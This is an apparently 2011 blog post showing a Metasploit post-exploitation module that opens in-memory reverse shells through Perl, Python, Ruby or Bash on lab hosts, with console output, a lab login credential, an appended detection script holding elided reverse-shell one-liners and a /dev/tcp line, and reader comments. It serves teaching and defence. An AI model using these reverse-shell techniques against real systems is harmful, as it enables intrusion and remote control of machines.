Secondary Shell Using Scripting Environment on Target
After writing the payload inject module for Windows I was looking through my Twitter feed and saw a tweet from Chris John Riley pointing to the PentestMonkey website, where there is a cheat sheet showing how to use a target's scripting environment to create a reverse shell in one line, passing the code as an argument so that nothing is actually written to disk and the session resides in memory. After seeing this I thought it would be a great idea to have such a module for Unix-type systems (Linux, BSD, HP-UX, Solaris, OS X, etc.), so I wrote a module for the framework called system_session. The module will look for the following scripting environments to use for creating a reverse shell:
- Perl
- Python
- Ruby
- Bash
It will check for the interpreters in this same order and use the first one present to create the reverse shell.
To show how the module works we will use some sessions to systems in my lab, where session 1 is a FreeBSD 8.2 VM and sessions 3 and 4 are Linux Ubuntu systems.
sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell bsd SSH admin:Newsystem01 (192.168.1.134:22) 192.168.1.241:55187 -> 192.168.1.134:22
2 meterpreter x86/win32 VICTIMLAB\administrator @ WIN701 192.168.1.100:4444 -> 192.168.1.138:23021
3 meterpreter x86/win32 VICTIMLAB\Administrator @ WIN2K3LAB01 192.168.1.100:4444 -> 192.168.1.138:4340
4 shell linux 192.168.1.100:4448 -> 192.168.1.135:37211
Let's start by selecting the module and looking at its options:
msf auxiliary(ssh_login) > use post/multi/manage/system_session
msf post(system_session) > show options
Module options (post/multi/manage/system_session):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER false yes Start an Exploit Multi Handler to receive the connection
LHOST yes IP of host that will receive the connection from the payload.
LPORT 4433 no Port for Payload to connect to.
SESSION yes The session to run this module on.
TYPE auto yes Scripting environment on target to use for reverse shell (accepted: auto, ruby, python, perl, bash)
Let's start with the case of letting the module select the first supported scripting environment, and set the remote session:
msf post(system_session) > set SESSION 1
SESSION => 1
msf post(system_session) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf post(system_session) > set HANDLER true
HANDLER => true
msf post(system_session) > run
[*] Starting exploit multi handler
[*] Started reverse handler on 192.168.1.100:4433
[*] Starting the payload handler...
[*] Python was found on target
[*] Python reverse shell selected
[*] Executing reverse tcp shel to 192.168.1.100 on port 4433
[*] Post module execution completed
msf post(system_session) > [*] Command shell session 5 opened (192.168.1.100:4433 -> 192.168.1.134:60732) at 2011-10-28 15:03:39 -0400
msf post(system_session) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell bsd SSH admin:Newsystem01 (192.168.1.134:22) 192.168.1.241:55187 -> 192.168.1.134:22
2 meterpreter x86/win32 VICTIMLAB\administrator @ WIN701 192.168.1.100:4444 -> 192.168.1.138:23021
3 meterpreter x86/win32 VICTIMLAB\Administrator @ WIN2K3LAB01 192.168.1.100:4444 -> 192.168.1.138:4340
4 shell linux 192.168.1.100:4448 -> 192.168.1.135:37211
5 shell bsd 192.168.1.100:4433 -> 192.168.1.134:60732
msf post(system_session) >
Now let's try just the Bash reverse TCP shell, which uses /dev/tcp, on one of the Linux systems:
msf post(system_session) > set SESSION 4
SESSION => 4
msf post(system_session) > set TYPE bash
TYPE => bash
msf post(system_session) > run
[*] Starting exploit multi handler
[-] Job 5 is listening on IP 192.168.1.100 and port 4433
[-] Could not start handler!
[-] A job is listening on the same Port
[*] Bash reverse shell selected
[*] Executing reverse tcp shel to 192.168.1.100 on port 4433
[*] Post module execution completed
msf post(system_session) > [*] Command shell session 6 opened (192.168.1.100:4433 -> 192.168.1.135:45662) at 2011-10-28 15:08:13 -0400
msf post(system_session) > sessions -i 6
[*] Starting interaction with 6...
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
carlos@infidel02-dev:/home/carlos/Desktop$ uname -a
uname -a
Linux infidel02-dev 2.6.32-25-generic #45-Ubuntu SMP Sat Oct 16 19:48:22 UTC 2010 i686 GNU/Linux
carlos@infidel02-dev:/home/carlos/Desktop$ ^Z
Background session 6? [y/N] y
As we can see, this can be quite useful when the shell we have is on a Unix-type system, where the framework still does not support injecting payloads into processes and where writing a file to disk is not necessarily the best option.
As always, I hope you find this information useful.
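Because these shells live only in memory and touch no file on disk, the defender's best telemetry is process execution: an interpreter started with its inline-code flag (perl -e, python -c, ruby -e) whose code both opens a socket and wires a shell to it, or a bash process whose command line references /dev/tcp. The following detection example is added here and is not code from the post or from the Metasploit module; it runs over a constructed, simplified process-event format (one key=value record per line, cmdline last) with the inline code deliberately elided. The field names and the sample events are assumptions for the demonstration.

```python
"""Flag interpreter-launched reverse shells in process-execution events.

Added defender-side example, not part of the original post or the
system_session module. Input is a constructed, simplified event format:
one process execution per line, key=value fields, cmdline last.
"""
import re
import shlex
from dataclasses import dataclass

# Interpreters the post names, with the flags that take code on the command line.
INLINE_CODE_FLAGS = {
    "perl": {"-e", "-E"},
    "python": {"-c"},
    "ruby": {"-e"},
}
# Inline code that opens a network connection ...
NETWORK_HINTS = re.compile(r"socket|connect|IO::Socket|TCPSocket|/dev/(tcp|udp)/", re.I)
# ... and hands a shell to it.
SHELL_HINTS = re.compile(r"subprocess|exec\b|dup2|/bin/sh|/bin/bash|popen|spawn", re.I)

# Constructed sample events (hypothetical pids/uids; payload bodies elided with "...").
SAMPLE_EVENTS = """\
pid=4021 ppid=3988 uid=1000 cmdline=python -c "import socket,subprocess,os; s=socket.socket(); ...; subprocess.call(['/bin/sh','-i'])"
pid=4030 ppid=4021 uid=1000 cmdline=/bin/sh -i
pid=4102 ppid=4011 uid=1000 cmdline=bash -c "exec 3<>/dev/tcp/192.0.2.10/4433; ..."
pid=4150 ppid=4011 uid=1000 cmdline=perl -e 'use IO::Socket::INET; ... exec("/bin/sh -i")'
pid=4200 ppid=4011 uid=1000 cmdline=python -c "import socket; print(socket.gethostname())"
pid=4210 ppid=4011 uid=1000 cmdline=ruby script.rb
pid=4220 ppid=4011 uid=1000 cmdline=perl -e 'print 1+1'
"""


@dataclass
class Finding:
    pid: int
    interpreter: str
    reason: str


def parse_event(line: str) -> dict:
    """Split 'k=v k=v cmdline=<rest>'; cmdline may contain spaces, so it is cut off first."""
    head, _, cmdline = line.partition(" cmdline=")
    fields = dict(f.split("=", 1) for f in head.split())
    fields["cmdline"] = cmdline
    return fields


def interpreter_name(arg0: str):
    """Normalise /usr/bin/python2.7 or perl5.10 to the bare interpreter name."""
    base = arg0.rsplit("/", 1)[-1]
    m = re.match(r"^(perl|python|ruby|bash|sh|dash)[\d.]*$", base)
    return m.group(1) if m else None


def inline_code(argv):
    """Return (interpreter, code) when argv is <interpreter> <inline-flag> <code>, else None."""
    if not argv:
        return None
    name = interpreter_name(argv[0])
    flags = INLINE_CODE_FLAGS.get(name)
    if not flags:
        return None
    for i, arg in enumerate(argv[1:-1], start=1):
        if arg in flags:
            return name, argv[i + 1]
    return None


def assess(event: dict):
    """Return a Finding for one event, or None if nothing looks like a reverse shell."""
    try:
        argv = shlex.split(event["cmdline"])
    except ValueError:  # unbalanced quotes in the captured command line
        argv = event["cmdline"].split()
    name = interpreter_name(argv[0]) if argv else None
    # Case 1: bash/sh using the /dev/tcp or /dev/udp redirection anywhere on the command line.
    if name in ("bash", "sh", "dash") and re.search(r"/dev/(tcp|udp)/", event["cmdline"]):
        return Finding(int(event["pid"]), name, "shell /dev/tcp redirection")
    # Case 2: perl/python/ruby with inline code that both opens a socket and spawns a shell.
    hit = inline_code(argv)
    if hit:
        interp, code = hit
        if NETWORK_HINTS.search(code) and SHELL_HINTS.search(code):
            return Finding(int(event["pid"]), interp, "inline code opens a socket and spawns a shell")
    return None


def scan(lines):
    """Run assess() over every non-empty event line and keep the findings."""
    return [f for f in (assess(parse_event(l)) for l in lines if l.strip()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS.splitlines()):
        print(f"pid {finding.pid}: {finding.interpreter} - {finding.reason}")
```

Requiring both a network hint and a shell hint in the same inline code keeps ordinary `python -c` one-liners (the gethostname sample) out of the results; on a real host the same logic would be fed from auditd execve records or an EDR's process-creation events, and the parent process (sshd, a web server, cron) is the next field worth adding to the finding.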
Reader Comments (3)
I only have two questions:
1- What if the target is a Windows system but has "python" installed. It must succeed too, right?
2- What if the Linux target doesn't have perl/python/ruby and its shell (bash) doesn't support /dev/tcp? Then we can't benefit from it, right?
My questions don't take anything away from your new feature for Metasploit, they're just questions running through my mind.
Thanks Dark,